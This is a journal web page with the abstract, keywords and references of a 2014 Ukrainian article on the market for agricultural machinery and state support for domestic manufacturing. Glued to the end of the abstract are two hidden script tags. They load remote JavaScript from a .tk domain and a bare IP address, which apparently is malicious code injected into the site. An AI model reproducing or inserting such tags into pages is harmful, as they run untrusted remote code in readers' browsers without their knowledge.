ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.43:631.3
Матеріально-технічне забезпечення аграрної сфери

Аналіз кон'юнктури ринку сільськогосподарської техніки в Україні / Соловей Д. Ю., Білоусько Я. К. // Економіка АПК. - 2014. - № 1 - С. 40

На основі дослідження кон'юнктури ринку сільськогосподарської техніки розглянуто взаємовідносини, які складаються в процесі купівлі-продажу на цьому ринку. За результатами проведеного аналізу розроблено пропозиції щодо удосконалення стимулювання розвитку виробництва конкурентоспроможної вітчизняної техніки та подальшого розвитку ринку сільськогосподарської техніки з метою підвищення технічного забезпечення аграрної галузі. Встановлено вплив Закону України «Про стимулювання розвитку вітчизняного машинобудування для агропромислового комплексу» на рівень і структуру закупівлі сільськогосподарської техніки аграрними підприємствами. Визначено структуру закупівлі підприємствами тракторів різної потужності й проведено порівняльний аналіз техніки зарубіжного і вітчизняного виробництва за ціновим критерієм. Розроблено пропозиції щодо удосконалення стимулювання розвитку вітчизняного сільгоспмашинобудування. Табл.: 4. Бібліогр.: 9.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: ринок сільськогосподарської техніки, кон’юнктура ринку, стимулювання розвитку, попит, виробництво сільськогосподарської техніки, матеріально-технічна база

Список використаних джерел

  1. Білоусько Я.К. Державна підтримка техніко-технологічного забезпечення аграрного виробництва /Я.К. Білоусько, В.О. Питулько, В.Л. Товстопят//Економіка АПК. – 2005. – №5. – С.30-35.
  2. Розвиток ринку сільськогосподарської техніки / [Я.К. Білоусько, А.В. Бурилко, П.А. Денисенко та ін.]. – К.: ННЦ ІАЕ, 2008. – 132 с.
  3. Іванишин В.В. Розвиток та функціонування ринку технічних засобів для сільського господарства в Україні / В.В.Іванишин // Економіка АПК.–2011.–№3. – С. 78-82.
  4. Кравчук В.І. Особливості системного підходу до управління вітчизняним ринком сільгосптехніки з врахуванням вимог СОТ / В.І. Кравчук, М.М. Павлишин, В.Г. Гусар // Зб. наук. праць УкрНДІПВТ ім. Л.Погорілого. – 2009. – Вип. 13(27), кн.1. – С. 59-65.
  5. Наявність сільськогосподарської техніки та енергетичних потужностей у сільському господарстві у 2012 році: стат. бюл. – К.: Статистика, 2013. – 42 с.
  6. Agricultural systems : economics, technology and diversity / Oliver W. Castalonge [editor]. p. cm. Includes bibliographical references and index.
  7. Frank Robert H. Principles of economics / Robert H. Frank, Bens Bemanke.–Boston: Mc Graw-Hill Irwin, 2001.– 834 p.
  8. Pryor F.L. Market economic systems / F.L. Pryor // Journal of Comparative Economics. – Vol. 33. – 2005. – P. 25-46.
  9. Salter W.E.G. Productivity and Technical Change. Front Cover. W. E. G. Salter. Cambridge University Press, 1969. – Labor productivity. – 220 p.
Читати статтю: 14_01_40-44.pdf